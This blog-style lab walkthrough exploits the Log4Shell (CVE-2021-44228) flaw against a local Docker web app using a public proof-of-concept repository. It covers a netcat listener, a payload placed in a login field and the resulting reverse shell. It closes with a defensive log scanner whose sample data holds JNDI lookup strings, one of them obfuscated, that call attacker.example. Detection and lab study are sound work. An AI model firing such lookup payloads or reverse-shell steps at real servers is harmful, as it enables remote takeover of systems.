Apache Log4j Shell POC exploits
On December 9, 2021, security researchers discovered a flaw in the code of a software library used for logging. The library, Log4j, is written in Java, a popular programming language, and is embedded in software and applications used worldwide. The flaw is estimated to be present in over 100 million instances globally.
The flaw, known as a vulnerability in the security community, was rated 10 out of 10 on the Common Vulnerability Scoring System (CVSS) because of the impact it can have if leveraged by attackers. Details of the vulnerability can be found in the National Vulnerability Database (NVD) under CVE-2021-44228.
In this article, I'm using a vulnerable web app to demonstrate a POC of the Apache Log4j vulnerability.
Log4Shell POC repository: https://github.com/kozmer/log4j-shell-poc
First, to set up the vulnerable web app environment, we need Docker.
A Docker setup guide for Kali Linux 2021.1:
Preparation
Before starting, ensure your Kali Linux is fully up to date.
Add the Docker PGP key (saved to /usr/share/keyrings/):
curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/docker-archive-keyring.gpg >/dev/null
Configure Docker APT repository (Kali is based on Debian testing, which will be called buster upon release, and Docker now has support for it):
echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
Update APT:
sudo apt-get update
Install Docker
If you have older versions of Docker installed, uninstall them first:
sudo apt-get remove -y docker docker-engine docker.io
Install Docker:
sudo apt-get install -y docker-ce
Test:
sudo docker run hello-world
To allow your non-root user to use Docker, add the user to the docker group:
sudo usermod -aG docker $USER
Set up the POC lab
git clone https://github.com/kozmer/log4j-shell-poc
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc
Once it's running, we can access it at localhost:8080.
Now set up the POC scripts
The POC Python script automates the attack process.
Requirements:
pip install -r requirements.txt
Usage
Start a netcat listener for the reverse connection.
Launch the exploit.
Note: For this to work, the extracted Java archive has to be named jdk1.8.0_20 and be in the same directory.
Download the JDK package.
Note: You do need to make an account to be able to download the package.
Once you have downloaded and extracted the archive, you can find java and a few related binaries in jdk1.8.0_20/bin.
Note: Please make sure to extract the JDK folder into this repository with the same name in order for it to work.
❯ tar -xf jdk-8u20-linux-x64.tar.gz
❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)
Rename the extracted folder to jdk1.8.0_20 (whatever version you downloaded) to match what the POC expects.
Now launch the POC exploit.
Paste the exploit payload into the username field, enter a random password, and hit login.
We immediately see the exploit.class file being sent to the server.
Look at the netcat listener, and we got the reverse shell!
The vulnerability allows remote code execution on the server, which can give an attacker full control of any impacted system.
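The payload in this walkthrough arrives in an ordinary form field and is only dangerous because Log4j evaluates lookup strings inside logged data. From the defender's side, the same property makes the attack visible in request logs. The following is an added detection example, not code from the original post or from the kozmer/log4j-shell-poc repository: it scans access-log lines for JNDI lookup strings, first collapsing the simple nested lookups (lower/upper and default-value forms) that public detection rules account for, so that a lightly obfuscated lookup still resolves to the literal pattern. The log lines, IP addresses and the attacker.example hostname are constructed for illustration.

```python
"""Flag CVE-2021-44228 (Log4Shell) lookup strings in web access logs.

Added example for this article; not part of the original post or the
kozmer/log4j-shell-poc repository. All sample data below is constructed.
"""
import re
from typing import Iterable, List, Tuple

# ${lower:X} / ${upper:X} lookups, used to hide the literal "jndi".
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^}]*)\}", re.IGNORECASE)
# Default-value lookups such as ${::-j} or ${foo:-j}, which resolve to the
# text after ":-" when the named key is undefined.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The lookup that actually triggers the remote class load.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:",
    re.IGNORECASE,
)


def normalize(line: str, max_rounds: int = 5) -> str:
    """Collapse case and default-value lookups until the line stops changing.

    Rounds are bounded so a pathological input cannot loop forever.
    """
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower()
            if m.group(1).lower() == "lower"
            else m.group(2).upper(),
            line,
        )
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == line:
            break
        line = new
    return line


def is_log4shell_probe(line: str) -> bool:
    """True if the (normalized) line carries a JNDI lookup to a remote scheme."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, line) for every suspicious log line."""
    return [(n, ln) for n, ln in enumerate(lines, 1) if is_log4shell_probe(ln)]


# Constructed access-log sample: lines 2 and 3 carry lookups in the
# User-Agent field, the first plain and the second lightly obfuscated.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "POST /login HTTP/1.1" 200 40 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "POST /login HTTP/1.1" 200 40 "-" "${${lower:J}${::-n}di:rmi://attacker.example/b}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET /static/app.js HTTP/1.1" 304 0 "-" "curl/7.79"',
]


if __name__ == "__main__":
    for n, ln in scan(SAMPLE_ACCESS_LOG):
        print(f"line {n}: {normalize(ln)}")
```

Point the scanner at the web server's access log or at the application log that Log4j itself writes; in this lab the login form's username value is what gets logged, so either source shows the lookup. Matching on the normalized string rather than the raw line is what keeps the second constructed hit from slipping past a plain search for the word jndi.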